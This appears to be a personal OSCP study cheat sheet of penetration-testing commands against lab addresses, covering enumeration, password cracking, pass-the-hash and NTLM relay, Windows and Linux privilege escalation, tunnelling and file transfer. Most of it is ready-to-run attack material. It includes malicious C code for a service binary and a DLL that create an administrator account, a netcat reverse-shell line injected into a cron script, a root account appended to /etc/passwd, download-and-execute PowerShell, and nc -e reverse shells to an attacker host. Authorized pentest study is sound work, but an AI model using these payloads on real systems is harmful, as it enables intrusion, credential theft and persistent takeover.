OSCP Cheat Sheet (Updating)

Refer

OSCP Playbook: https://fareedfauzi.gitbook.io/oscp-playbook/services-enumeration/smb

GTFOBins: https://gtfobins.github.io/gtfobins/apt-get/#sudo

Setup

1
2
3
4
5
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@192.168.50.52
sudo updatedb
locate XXX
sudo openvpn universal.ovpn

Recon

Passively Gather

1
2
3
4
5
6
7
8
9
10
11
12
// Whois
whois megacorpone.com -h 192.168.50.251
whois 38.100.193.70 -h 192.168.50.251 #reverse lookup
// Google Hacking
site:megacorpone.com
// Github Search
Gitleaks, Gitrob
// Shodan
hostname:megacorpone.com
// SSL/TLS Headers
Disabling the TLS_DHE_RSA_WITH_AES_256_CBC_SHA suite has been recommended for several years

Actively Gather

DNS Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
// DNS Enumeration - linux
NS, A, AAAA, MX, PTR, CNAME, TXT
host www.megacorpone.com
host -t mx megacorpone.com
// DNS Enumeration in batches
	//domain
	sudo apt install seclists
	for ip in $(cat list.txt); do host $ip.megacorpone.com; done
	//reverse lookup(if PTR)
	for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found"
	//tools
	dnsrecon -d megacorpone.com -t std // std=standard type
	dnsrecon -d megacorpone.com -D ~/list.txt -t brt //subdomain
	dnsenum megacorpone.com // forward+reverse lookups
// DNS Enumeration - Windows

nslookup mail.megacorptwo.com
nslookup -type=TXT info.megacorptwo.com 192.168.50.151

TCP/UDP (Linux)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
// TCP
nc -nvv -w 1 -z 192.168.50.152 3388-3390
// UDP
nc -nv -u -z -w 1 192.168.50.149 120-123
// nmap
sudo iptables -I INPUT 1 -s 192.168.50.149 -j ACCEPT
sudo iptables -I OUTPUT 1 -d 192.168.50.149 -j ACCEPT
sudo iptables -Z //refresh
nmap 192.168.50.149
sudo iptables -vn -L
sudo nmap -sS 192.168.50.149
nmap -sT 192.168.50.149
sudo nmap --min-rate 2000 -sS 192.168.226.188 -Pn -T4 -p 1-65535
// nmap udp
sudo nmap -sU 192.168.50.149
// nmap combine
sudo nmap -sU -sS 192.168.50.149
// nmap active hosts
nmap -sn 192.168.50.1-253

nmap -v -sn 192.168.50.1-253 -oG ping-sweep.txt
grep Up ping-sweep.txt | cut -d " " -f 2
// nmap service version
nmap -sV 192.168.50.1 -p T:135,445 U:123
nmap -A 192.168.50.1 -p T:135,445 U:123
// nmap overall 
nmap -sT -A --top-ports=20 192.168.50.1-253 -oG top-port-sweep.txt
// nmap os guess, and 
sudo nmap -O 192.168.50.14 --osscan-guess
nmap -sT -A 192.168.50.14 (-sV for plain service)
// nmap script
nmap --script http-headers 192.168.50.6 // /usr/share/nmap/scripts
nmap --script-help http-headers

TCP/UDP(Windows)

1
2
Test-NetConnection -Port 445 192.168.50.151
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null

SMB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nmap -v -p 139,445 -oG smb.txt 192.168.50.1-254 // NetBLOS 139, SMB 445
sudo nbtscan -r 192.168.50.0/24 // NetBIOS, -r UDP 137
ls -1 /usr/share/nmap/scripts/smb* //nmap NSE scripts for smb
nmap -v -p 139,445 --script smb-os-discovery 192.168.50.152

//exploit
nmap -T5 -sV --script 'smb-vuln*' <IP>
rdpscan <IP> // for Bluekeep(CVE-2019-07-08)
crackmapexec smb <IP> -u '' -p '' --shares
rpcclient -U "" -N $ip
enum4linux -a $ip
smbclient -L $IP
smbclient \\\\$ip\\[share name]
smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234

*Windows*
net view \\dc01 /all
net use Z: \\dc01\C$

SMTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nc -nv 192.168.50.8 25
VRFY root

//user enumeration
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt  -t $ip

for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers

**Windows**

Test-NetConnection -Port 25 192.168.50.8

dism /online /Enable-Feature /FeatureName:TelnetClient // download
c:\windows\system32\telnet.exe // grab from other machines
telnet 192.168.50.8 25 
VRFY goofy

SNMP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
sudo nmap -sU --open -p 161 192.168.50.1-254 -oG open-snmp.txt
//probe
echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips
//query MIB
snmpwalk -c public -v1 -t 10 192.168.50.151 (-Oa hex->string)
//enumerate windows users on the dc
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.4.1.77.1.2.25
//enumerate current running processes
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.4.2.1.2
//enumerate all installed software
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.25.6.3.1.2
//enumerate all the current TCP listening ports
snmpwalk -c public -v1 192.168.50.151 1.3.6.1.2.1.6.13.1.3

HTTP

1
gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5

misc

1
2
3
4
5
6
7
8
9
//kali RDP
xfreerdp /u:student /p:lab /v:192.168.240.152 /dynamic-resolution
// Domain
net time /domain
ipconfig /all
systeminfo

// get a interactive shell by pty before ssh
python3 -c 'import pty; pty.spawn("/bin/bash")'

Exploits

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
The Exploit Database: https://www.exploit-db.com/
Packet Storm: https://packetstormsecurity.com
google hacking: Microsoft Edge site:exploit-db.com

Metasploit
Core Impact
Canvas
Browser Exploitation Framework (BeEF)

exploitdb
sudo apt update && sudo apt install exploitdb
/usr/share/exploitdb/
searchsploit
searchsploit afd windows local
  searchsploit -t oracle windows
  searchsploit -p 39446
  searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
  searchsploit -s Apache Struts 2.0.0
  searchsploit linux reverse password
  searchsploit -j 55555 | json_pp
searchsploit remote smb microsoft windows
searchsploit -m windows/remote/48537.py //copy to current dir
searchsploit -m 42031

nmap
grep Exploits /usr/share/nmap/scripts/*.nse
nmap --script-help=clamav-exec.nse

Script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/bash

# 获取命令行参数
dictionary_file=$1
shift
command_to_run="$*"

# 检查文件是否存在
if [ ! -f "$dictionary_file" ]; then
    echo "字典文件不存在: $dictionary_file"
    exit 1
fi

# 循环遍历文件中的每一行
while IFS= read -r line; do
    eval "$command_to_run '$line'"
done < "$dictionary_file"

// scan 445

for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done

Password Crack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
## Password Manager
KeePass, .kdbx 
// get the location of the file
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
// extract the passwords using JtR suite
keepass2john Database.kdbx > keepass.hash
hashcat --help | grep -i "KeePass"
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

## 3389, RDP
// brute force
hydra -l nadine -P /usr/share/wordlists/rockyou.txt rdp://192.168.233.227

## SSH Private Key Passphrase
> chmod 600 id_rsa
> ssh2john id_rsa > ssh.hash
> cat ssh.rule
[List.Rules:sshRules]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
> sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
> john --wordlist=ssh.passwords --rules=sshRules ssh.hash
> ssh -i id_rsa dave@192.168.233.201 -p 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null

# NTLM
Get-LocalUser
.\mimikatz.exe
privilege::debug

// option 1
sekurlsa::logonpasswords
// option2
token::elevate
lsadump::sam

hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Hash Pass - NTLM
// others: CrackMapExec, 
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212 (cmd.exe)

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

# Hash Capture - Net-NTLMv2 (unprivileged)
// set up a smb server to capture the hash in the request sent from victims
net user paul
sudo responder -I tun0
dir \\192.168.119.2\test
hashcat --help | grep -i "ntlm"
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
// try the login form by UNC in the web applications
Content-Disposition: form-data; name="myFile"; filename="\\\\192.168.45.204\\test"

# Hash Relaying - Net-NTLMv2
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
https://www.revshells.com/
dir \\192.168.119.2\test

# brute force ssh
crunch 6 6 -t Lab%%% > wordlist (passwords list Lab001,Lab002 ...)
hydra -l eve -P wordlist  192.168.50.214 -t 4 ssh -V

Privilege Escalation

Windows

Privilege Escalation by enumerating windows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
# Information Gathering

- Username and hostname
	> whoami
- Group memberships of the current user
	> whoami / groups
- Existing users and groups
	> powershell
	> Get-LocalUser
	> Get-LocalGroup / net localgroup
	> Get-LocalGroupMember Adminitrators
- Operating system, version and architecture
	> systeminfo
- Network information
	> ipconfig /all
	> route print
	> netstat -ano
- Installed applications
 > Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname //32bit
	> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname //64bit
	> dir C:\Program Files
	> dir C:\Downloads
- Running processes
	> Get-Process

# Information Gathering through file system

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

// WinRM or RDP to access the system if the user is a member of the corresponding groups
// if the target user has the Log on as a batch job access right -> schedule task to execute programs as the target user
// If the target user has an active session -> psexec to execute command as the user
// If having GUI, use Runas in powershell to start cmd as the user of which we have credential
runas /user:backupadmin cmd

# Information Gathering through logs
// PowerShell Transcription and PowerShell Script Block Logging.
Get-History
(Get-PSReadlineOption).HistorySavePath
//Sometimes creating a remote PowerShell session via WinRM in a bind shell can cause unexpected bahavior, so we use evil-winrm
evil-winrm -i target -u daveadmin -p "qwertqwertqwert123\!\!"

# Automate Enumeration (not that reliable)
A:cp /usr/share/peass/winpeas/winPEASx64.exe .
A:python3 -m http.server 80

V:iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
V:.\winPEAS.exe

Privilege escalation by leveraging windows services

  • service hijacking
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
//snap-in services.msc, the Get-Service Cmdlet, or the Get-CimInstance Cmdlet (superseding Get-WmiObject) to list services on the machine
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
//choose between the traditional `icacls` Windows utility or the PowerShell Cmdlet `Get-ACL` to query the permissions
MASK	PERMISSIONS
F	    Full access
M	    Modify access
RX	  Read and execute access
R	    Read-only access
W	    Write-only access
> icacls "C:\xampp\mysql\bin\mysqld.exe"
// when F permission, we can replace binary with a evil one
#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user dave2 password123! /add");
  i = system ("net localgroup administrators dave2 /add");
  
  return 0;
}
kali > x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
win > iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe
win > move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
win > move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
win > net stop mysql // no permission
// check Startup Type of the service
win > Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
// Should have SeShutDownPrivilege to reboot (disabled mean nnothing)
win > whoami /priv
win > shutdown /r /t 0
win > Get-LocalGroupMember administrators

  • Automated tool to get all modifiable services and replace binary with bad ones
1
2
3
4
5
6
7
8
9
kali > cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .
kali > python3 -m http.server 80
win > iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
win > powershell -ep bypass
win > . .\PowerUp.ps1
// list modifiable services
win > Get-ModifiableServiceFile
// replace binary and restart it - default behavior is to create user `john` with the password `Password123!`, and add it to the local Administrators group
win > Install-ServiceBinary -Name 'mysql'
  • DLL Hijacking
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/* when DLL missed in an application and safe DLL search mode is disabled, we can put malicious DLL at the current directory 

General DDL loading order:
1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. The directories that are listed in the PATH environment variable.

*/
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
// if we don't have permission to replace the binary, we can try DLL Hijacking
> icacls .\Documents\BetaServ.exe
note: if limited permission, copy the binary to local machine to analyze
> C:\tools\Procmon\Procmon64.exe
note: create a filter by Filter menu > Filter... -> process name is XXX
> Restart-Service BetaService OR execute the binary on the local environment
> $env:path
//malicious ddl
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave2 password123! /add");
  	    i = system ("net localgroup administrators dave2 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
kali > x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll
win > iwr -uri http://kali/myDLL.dll -Outfile myDLL.dll
win > Restart-Service BetaService
win > net user / net localgroup administrators
  • Unquoted Service Paths
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/* 

how Windows will try to locate the correct path of an unquoted service

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

*/
// filter services with unquoted service path
// option1
> Get-CimInstance -ClassName win32_service | Select Name,State,PathName
// option2
> wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
// check if user has the permission to start or top a service
> Start-Service GammaService
> Stop-Service GammaService
// check if the user has the `W` access rights
> icacls "C:\Program Files"
> icacls "C:\Program Files\Enterprise Apps"
// same as the rest of the processes in the chapter of "Service Binary Hijacking"
> iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe
> copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
> Start-Service GammaService (although errors may be reported, still can work)

// Automated tool to conduct unquoted service paths attack, creating a user john@Password123!
> iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1
> powershell -ep bypass
> . .\PowerUp.ps1
> Get-UnquotedService
> Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe" (target vulnerable location)
> Restart-Service GammaService
> net user / net localgroup Administrators
  • Scheduled Tasks
1
2
3
4
5
6
7
8
9
// ScheduledTask1 Cmdlet or the command schtasks /query

> schtasks /query /fo LIST /v
> icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
> iwr -Uri http://kali/adduser.exe -Outfile BackendCacheCleanup.exe
> move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak
> move .\BackendCacheCleanup.exe .\Pictures\
> net user / net localgroup administrators

  • Using Exploits
1
2
3
4
5
6
7
8
9
10
11
12
13
14
- Exploit programs' vulnerabilities with high permission running in the system 
- Exploit vulnerabilities existing in the Windows kernel.

- Leverage Non-privileged users with assigned privileges (SelmperonatePrivilege) (RPC, named pipes)
// Other privileges that may lead to privilege escalation are SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and SeDebug.
// IIS server normally has SeImpersonatePrivilege. We can use printspoofer to exploit it.
// Other tools: RottenPotato, SweetPotato, or JuicyPotato
win > whoami /priv
kali > wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
kali > python3 -m http.server 80
win > powershell
win > iwr -uri http://kali/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
win > .\PrintSpoofer64.exe -i -c powershell.exe
win > whoami
  • Others:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md#eop---privileged-file-write

Linux

  • Enumerating Linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
id
cat /etc/passwd (id 1000+)
hostname
// os version (kernel exploit)
cat /etc/issue
cat /etc/os-release
uname -a

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"

//list processes
ps aux

ip a
// display networ
k routing tables
routel | route
// list all connections
ss -anp
// firewall rules (also `iptables-save` )
cat /etc/iptables/rules.v4
// list cron jobs' subdirectory
ls -lah /etc/cron*
// list current user's scheduled jobs
crontab -l
sudo crontab -l (regular user has permission to sudo list cron jobs)
grep "CRON" /var/log/syslog // for cron jobs log
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh
// list applications
dpkg -l
// list all writable directories
find / -writable -type d 2>/dev/null
// check the existence of unmounted drives
cat /etc/fstab
mount
// list all available disks
lsblk
// list loaded kernel modules (search exploit)
lsmod
// detailed kernel module info
/sbin/modinfo libata(certain module_name)
// SetUID, SetGID (GTFOBins)
find / -perm -u=s -type f 2>/dev/null
	// if `find` has SetUID
	find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
// linux capabilities (GTFOBins)
/usr/sbin/getcap -r / 2>/dev/null
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' (https://gtfobins.github.io/)
// environment variables
env
cat .bashrc
// verify if running as a privileged user (GTFOBins)
sudo -l (GTFOBins)
sudo -i
cat /var/log/syslog | grep tcpdump // AppArmor defender

// inspecting service footprints
watch -n 1 "ps -aux | grep pass"
// capture traffic
sudo tcpdump -i lo -A | grep "pass"

// if /etc/passwd writable
openssl passwd w00t
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2 //with password w00t
id

//automated tools
./unix-privesc-check standard > output.txt
LinEnum
linux-exploit-suggester

Port Redirection and SSH Tunneling

Linux Port Forwarding

1
2
3
4
5
6
7
8
9
// Port Forwarding
victim > socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432
kali > psql -h 192.168.50.63 -p 2345 -U postgres
	> \l
	> \c confluence
	> select * from cwd_user;
////{PKCS5S2}skupO/gzzNBHhLkzH3cejQRQSP9vY4PJNT6DrjBYBs23VRAq4F5N85OAAdCv8S34
kali > hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt

Linux SSH Tunneling

  • SSH Local Port Forwarding
1
2
// SSH Local Port Forwarding
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215 (-v)
  • SSH Dynamic Port Forwarding
1
2
3
4
5
6
7
8
9
// SSH Dynamic Port Forwarding
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215
tail /etc/proxychains4.conf
[ProxyList]
socks5 192.168.50.63 9999
proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
// Lowering the tcp_read_time_out and tcp_connect_time_out values in the Proxychains configuration
proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217
  • SSH Remote Port Forwarding
1
2
3
4
5
6
7
8
9
10
11
12
// kali ssh server, stet up a listening tcp port on kali;
// victim ssh client, ssh to kai
// All the traffic is pushed by Kali toward the ssh client
// ssh client forwards all the traffic from the ssh server to any target as long as it configured
// PasswordAuthentication to yes in /etc/ssh/sshd_config
kali> sudo systemctl start ssh
kali> sudo ss -ntplu
victim > python3 -c 'import pty; pty.spawn("/bin/bash")'
// -R kaliIP:port
victim > ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
kali > psql -h 127.0.0.1 -p 2345 -U postgres
	> \l
  • SSH Remote Dynamic Port Forwarding
1
2
3
4
5
6
7
8
9
// only the OpenSSH client needs to be version 7.6 or above to use it - the server version doesn't matter
kali> sudo systemctl start ssh
kali> sudo ss -ntplu
victim > python3 -c 'import pty; pty.spawn("/bin/bash")'
victim > ssh -N -R 9998 kali@192.168.118.4
kali > vim /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 9998
proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64
  • Using sshuttle
1
2
3
victim > socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
kali > sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24
kali > smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234

Port Forwarding with Windows Tools

  • SSH
1
2
3
4
5
6
7
8
9
10
11
12
// Since version 1803 (April 2018 Update), ssh- utilities are bundled with Windows in %systemdrive%\Windows\System32\OpenSSH

// Remote dynamic port forward (OpenSSH > 7.6)
kali > sudo systemctl start ssh
win > where ssh
win > ssh -N -R 9998 kali@192.168.118.4
kali > ss -ntplu
kali > vim /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 9998
kali > proxychains psql -h 10.4.50.215 -U postgres
	 > \l
  • Plink
1
2
3
4
5
6
// PuTTY
kali > sudo systemctl start apache2
kali > find / -name plink.exe 2>/dev/null
kali > sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/
windows > powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

  • Netsh

File Transfer

  • windows -> kali
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/// 1
Python -m pyftpdlib -w
Windows machine: ftp Open <Linux IP> <Port> User: anonymous Password: anonymous 
Put <windows_file>

/// 2
Start an impacket smb server on kali with smb2 support flag.
On windows victim power shell: copy-item <target file> \\<kali ip>\<share name>\<destination file name>

impacket-smbserver test . -smb2support  -username kourosh -password kourosh
//option 1 on windows
copy-item .\Database.kdbx \\192.168.45.204\test\Database.kdbx
//option2 on windows
net use m: \\Kali_IP\test /user:kourosh kourosh
copy mimikatz.log m:\

/// 3
xfreerdp /cert-ignore /compression /auto-reconnect /u:offsec /p:lab /v:192.168.212.250 /w:1600 /h:800 /drive:test,/home/kali/Documents/pen-200

copy mimikatz.log \\tsclient\test\mimikatz.log

/// 4 
Using powercat + powershell. Host powercat.ps1(link: https://github.com/besimorhino/powercat/blob/master/powercat.ps1) in a webserver on the attacker machine. Execute powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://kali-ip/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoTransfer" On kali: wget http://windows-ip:4444/FileToTransfer

  • kali -> windows
1
2
3
4
5
6
7
8
9
// 1 
kali > python3 -m http.server 80
win > iwr -uri http://kali/adduser.exe -Outfile adduser.exe

// 2
kali > sudo systemctl start apache2
kali > find / -name nc.exe 2>/dev/null
kali > sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
windows > powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

Reverse Shell

  • Windows
1
2
3
4
5
6
7
kali > sudo systemctl start apache2
kali > find / -name nc.exe 2>/dev/null
kali > sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
windows > powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
kali > nc -nvlp 4446
windows > C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446